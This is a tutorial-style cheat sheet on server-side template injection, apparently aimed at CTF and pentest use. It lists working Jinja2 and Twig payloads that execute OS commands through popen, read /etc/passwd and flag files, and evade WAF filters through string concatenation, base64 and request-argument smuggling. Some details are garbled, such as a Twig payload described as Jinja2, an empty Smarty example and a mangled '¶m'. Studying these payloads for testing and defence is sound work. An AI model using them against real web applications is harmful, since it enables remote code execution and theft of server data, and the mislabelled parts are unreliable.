Comprehensive Guide to SSTI Explained with Payload Bypass Techniques
Introduction
Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can result in comand execution, arbitrary code execution, or access to sensitive data. Below is a detailed explanation with examples of payloads and bypass techniques.
Example: Analyzing and Detecting SSTI
Test Input:
user=1231{{2*4}}
The template renders the result of 2 * 4 as 8, indicating potential template injection.
Confirm SSTI Using Commands
user={{system('ls')}}
While attempting this payload, a command does not execute due to filtering limitations (e.g., space filtering).
Advanced Testing Payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
This payload attempts to bypass filters by using Jinja2's advanced undefined filter callback registration.
Jinja2 Syntax and Structures
- Control Structure:
{% %} - Variable Evaluation:
{{ }} - Comments:
{# #}
Explore All Available Classes:
{{[].__class__.__base__.__subclasses__()}}
Used to inspect the available modules and classes with in the application.
File and Command Execution:
Inspect Available Global Functions:
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls").read()')
This payload finds the current location of the flag file.
Read Sensitive Files:
{{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}
Uses the file class’s read method to access restricted files.
Fundamental Class and Method Insights:
Key attributes useful for exploitation:
__class__ # Retrieves the object's class
__mro__ # Returns a tuple of the class hierarchy
__base__ # Returns the immediate parent class
__subclasses__ # Returns a list of subclasses
__globals__ # Returns global variables dictionary
Finding Payload Execution Resources:
[].__class__.__base__.__subclasses__()[30].__init__.__globals__
[].__class__.__base__.__subclasses__()[40](filename).read()
[].__class__.__base__.__subclasses__()[59].__init__.__globals__['os'].listdir('.')
Using Payload Collections
Common Remote Code Execution Payload:
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval('__import__("os").popen("ls").read()') }} {% endif %} {% endfor %}
File Read Payload:
[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()
Execute System Commands:
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()
WAF Bypass Techniques
Bypassing Character Filters:
When [] characters are filtered:
''.__class__.__mro__.getitem(2)
''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/etc/passwd').read()
Handling _ Filters:
{{ request[request.args.param] }}¶m=__class__
Filter request or class keywords:
{{ session['__cla' + 'ss__'] }}
String Manipulation for Bypass
Base64 Decoding:
().__class__.__bases__[0].__subclasses__()[40]('r', 'ZmxhZy50eHQ='.decode('base64')).read()
String Concatenation:
().__class__.__bases__[0].__subclasses__()[40]('r', 'fla'+'g.txt').read()
Advanced Techniques
Template-Specific Exploits:
Smarty PHP Injection Example:
{php}{/php}
Twig Injection:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
Overloading Built-ins:
When built-ins are restored:
reload(__builtins__)
Final Thoughts
Payload crafting in SSTI requires knowledge of the application structure, filtered keywords, and ways to bypass restrictions. Proper input sanitization is key to mitigating these attacks. Studying examples and testing bypass attempts can unveil vulnerabilities.
For further reading, explore:
